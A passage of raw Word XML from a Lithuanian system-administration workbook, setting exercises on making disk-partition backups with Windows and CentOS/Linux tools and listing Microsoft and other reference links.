          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Install, upgrade, or migrate to Windows Server </w:t>
      </w:r>
      <w:r w:rsidR="004E065A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, </w:t>
      </w:r>
      <w:r w:rsidR="3F154144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">rugsėjo 17). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Microsoft.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows-server/get-started-19/install-upgrade-migrate-19</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="084C5F3D" w14:textId="2CCAABA4" w:rsidR="4619E5D7" w:rsidRPr="005A5C28" w:rsidRDefault="4619E5D7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Windows server 2019 Step-By-Step: Setup Active Directory environment using PowerShell. https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx#Step_1_Login_as_Local_Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10243D2E" w14:textId="3075D9FC" w:rsidR="009268AD" w:rsidRPr="005A5C28" w:rsidRDefault="009268AD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D424546" w14:textId="4F38677E" w:rsidR="13D53724" w:rsidRPr="005A5C28" w:rsidRDefault="77DC5AF7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="15EE42AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="47417742" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="47417742" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Hlk66776328"/>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PANAUDOJANT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> WINDOWS OPERACINĖS SISTEMOS ĮRANKI</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>US</w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="65634AC2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SUKURTI DUOMENŲ ATSARGINĘ KOPIJĄ</w:t>
      </w:r>
      <w:r w:rsidR="47417742" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4CB08" w14:textId="242FCE76" w:rsidR="006670B4" w:rsidRPr="005A5C28" w:rsidRDefault="47417742" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pasinaudodami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>WINDOWS operacinės sistemos įrankiais</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sukurkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pasirinkto disko skirsnio duomenų kopiją</w:t>
      </w:r>
      <w:r w:rsidR="000C3D41" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C4379" w14:textId="74717094" w:rsidR="004E62C0" w:rsidRPr="005A5C28" w:rsidRDefault="004E62C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78666CD5" w14:textId="28B6E5D7" w:rsidR="76372F66" w:rsidRPr="005A5C28" w:rsidRDefault="571FB42E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA86B0E" w14:textId="5E50B38B" w:rsidR="007E3E56" w:rsidRPr="005A5C28" w:rsidRDefault="7E0A4983" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup and Restore in Windows 10. </w:t>
      </w:r>
      <w:r w:rsidR="39224B77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="39224B77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidR="71922B83" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="646E6827" w14:textId="1219E7B3" w:rsidR="76372F66" w:rsidRPr="005A5C28" w:rsidRDefault="3076F1DA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Using Windows Server Backup to back up and restore Exchange data. (</w:t>
      </w:r>
      <w:r w:rsidR="72DC7193" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2020, liepos 1). </w:t>
      </w:r>
      <w:r w:rsidR="72DC7193" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="72DC7193" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="72DC7193" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:kern w:val="0"/>
            <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/windows-server-backup?view=exchserver-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6718CB2C" w14:textId="512265D9" w:rsidR="76372F66" w:rsidRPr="005A5C28" w:rsidRDefault="06C8B675" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>McMillen</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> R. (2018, vasario 27). </w:t>
      </w:r>
      <w:r w:rsidR="5A9AEB5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install and use Windows Server Backup on Server 2016. </w:t>
      </w:r>
      <w:r w:rsidR="39168A3B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Robert McMillen.</w:t>
      </w:r>
      <w:r w:rsidR="1001E1DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="39168A3B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internet</w:t>
      </w:r>
      <w:r w:rsidR="095D5D44" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r w:rsidR="095D5D44" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="571FB42E" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>ttps://www.youtube.com/watch?v=lqjrF7f_eI4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="640CAEE1" w14:textId="07262430" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="10FA8B13" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9CB9DD" w14:textId="15CA1D1A" w:rsidR="3B6F97F0" w:rsidRPr="005A5C28" w:rsidRDefault="3E36A57C"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1</w:t>
      </w:r>
      <w:r w:rsidR="2C060A94" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="2D816EDA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r w:rsidR="6A548577" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>žduotis.</w:t>
      </w:r>
      <w:r w:rsidR="2D423EA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASINAUDOJANT LINUX OPERACINĖS SISTEMOS ĮRANKIAIS</w:t>
      </w:r>
      <w:r w:rsidR="00620407" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6A548577" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURTI DUOMENŲ ATSARGINĘ KOPIJĄ</w:t>
      </w:r>
      <w:r w:rsidR="006817EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="6A548577" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CD776" w14:textId="1A1096C5" w:rsidR="073BC272" w:rsidRPr="005A5C28" w:rsidRDefault="553D10E4"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 xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="009A66D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="1CABCB14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>asinaudo</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>dami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7257018C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002A5374" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="7257018C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="666826F6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba LINUX analogiškos</w:t>
      </w:r>
      <w:r w:rsidR="6D25980D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>operacinės sistemos įrankiais</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sukur</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6F75E597" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pasirinkto</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> disko</w:t>
      </w:r>
      <w:r w:rsidR="1B23FAF3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> skirsnio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų kopij</w:t>
      </w:r>
      <w:r w:rsidR="009A66D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A963D" w14:textId="77777777" w:rsidR="00902AC8" w:rsidRPr="005A5C28" w:rsidRDefault="00902AC8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D3A82F" w14:textId="3C36C684" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="66FAD8A7"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Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471A851" w14:textId="2E6DEDDD" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="3F031E91" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Harris J. </w:t>
      </w:r>
      <w:r w:rsidR="11A03A2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, gruodžio 24). </w:t>
      </w:r>
      <w:r w:rsidR="46991A12" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Use Rsync to Create a Backup on CentOS 8. </w:t>
      </w:r>
